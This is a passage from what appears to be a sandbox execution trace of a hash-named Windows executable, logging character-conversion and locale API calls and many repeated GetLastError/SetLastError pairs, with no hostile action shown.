lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.363] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0036.363] GetLastError () returned 0x0 [0036.363] SetLastError (dwErrCode=0x0) [0036.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0036.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.363] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā") returned 256 [0036.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.363] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0036.363] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x51\x88\x0b\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0036.363] GetLastError () returned 0x0 [0036.363] SetLastError (dwErrCode=0x0) [0036.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0036.364] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā") returned 256 [0036.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0036.364] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿꭤﳋ⍬@Ā", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0036.364] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x51\x88\x0b\xef\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0036.364] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x412b60, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe" (normalized: "c:\\users\\eebsym5\\desktop\\1408a24b74949922cc65164eea0780449c2d02bb6123fd992b2397f1873afd21.exe.bin.exe")) returned 0x65 [0036.364] GetLastError () returned 0x0 [0036.364] SetLastError (dwErrCode=0x0) [0036.364] GetLastError () returned 0x0 [0036.364] SetLastError (dwErrCode=0x0) [0036.364] GetLastError () returned 0x0 [0036.364] SetLastError (dwErrCode=0x0) [0036.364] GetLastError () returned 0x0 [0036.364] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.365] SetLastError (dwErrCode=0x0) [0036.365] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.366] SetLastError (dwErrCode=0x0) [0036.366] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.367] SetLastError (dwErrCode=0x0) [0036.367] GetLastError () returned 0x0 [0036.368] SetLastError (dwErrCode=0x0) [0036.368] GetLastError () returned 0x0 [0036.368] SetLastError (dwErrCode=0x0) [0036.368] GetLastError () returned 0x0 [0036.368] SetLastError (dwErrCode=0x0) [0036.368] GetLastError () returned 0x0 [0036.368] SetLastError (dwErrCode=0x0) [0036.368] GetLastError () returned 0x0 [0036.368] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.369] GetLastError () returned 0x0 [0036.369] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.370] SetLastError (dwErrCode=0x0) [0036.370] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.371] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.371] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.371] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.371] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.371] GetLastError () returned 0x0 [0036.371] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.372] SetLastError (dwErrCode=0x0) [0036.372] GetLastError () returned 0x0 [0036.373] SetLastError (dwErrCode=0x0) [0036.373] GetLastError () returned 0x0 [0036.373] SetLastError (dwErrCode=0x0) [0036.373] GetLastError () returned 0x0 [0036.373] SetLastError (dwErrCode=0x0) [0036.373] GetLastError () returned 0x0 [0036.373] SetLastError (dwErrCode=0x0) [0036.373] GetLastError () returned 0x0 [0036.374] SetLastError (dwErrCode=0x0) [0036.374] GetLastError () returned 0x0 [0036.374] SetLastError (dwErrCode=0x0) [0036.374] GetLastError () returned 0x0 [0036.374] SetLastError (dwErrCode=0x0) [0036.374] GetLastError () returned 0x0 [0036.374] SetLastError (dwErrCode=0x0) [0036.374] GetLastError () returned 0x0 [0036.374] SetLastError (dwErrCode=0x0) [0036.374] GetLastError () returned 0x0 [0036.375] SetLastError (dwErrCode=0x0) [0036.375] GetLastError () returned 0x0 [0036.375] SetLastError (dwErrCode=0x0) [0036.375] GetLastError () returned 0x0 [0036.375] SetLastError (dwErrCode=0x0) [0036.375] GetLastError () returned 0x0 [0036.375] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.376] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.376] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.376] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.376] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.376] SetLastError (dwErrCode=0x0) [0036.376] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.377] GetLastError () returned 0x0 [0036.377] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.378] SetLastError (dwErrCode=0x0) [0036.378] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] GetLastError () returned 0x0 [0036.379] SetLastError (dwErrCode=0x0) [0036.379] 